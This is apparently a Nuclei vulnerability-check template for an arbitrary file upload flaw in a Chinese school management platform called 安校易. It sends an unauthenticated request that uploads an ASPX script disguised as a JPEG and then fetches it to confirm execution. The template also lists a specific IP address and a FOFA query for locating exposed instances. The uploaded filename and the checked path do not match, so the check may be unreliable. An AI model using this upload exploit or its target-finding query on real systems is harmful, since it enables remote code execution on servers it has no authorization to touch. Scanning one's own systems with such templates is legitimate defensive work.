id: Edu-安校易
 
info:
  name: Edu-安校易
  author: xxx
  severity: info
  description: http://106.12.140.252:8001//Upload/Publish/000000/0_0_0_0/update.aspx
  metadata:
    fofa-query: title="智慧综合管理平台登入"
  tags: 

http:
  - raw:
    - |
      POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
      Accept: application/json, text/javascript, */*; q=0.01
      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
      X-Requested-With: XMLHttpRequest
      Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
      Connection: close
      
      ------21909179191068471382830692394
      Content-Disposition: form-data; name="Filedata"; filename="qaxnb.aspx"
      Content-Type: image/jpeg
      
      <%@Page Language="C#"%><%Response.Write("qaxnb");System.IO.File.Delete(Request.PhysicalPath);%>
      ------21909179191068471382830692394--
 
    - |
      GET /Upload/Publish/000000/0_0_0_0/update.aspx HTTP/1.1
      Host: {{Hostname}}
 
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'qaxnb'
 
      - type: status
        status:
          - 200
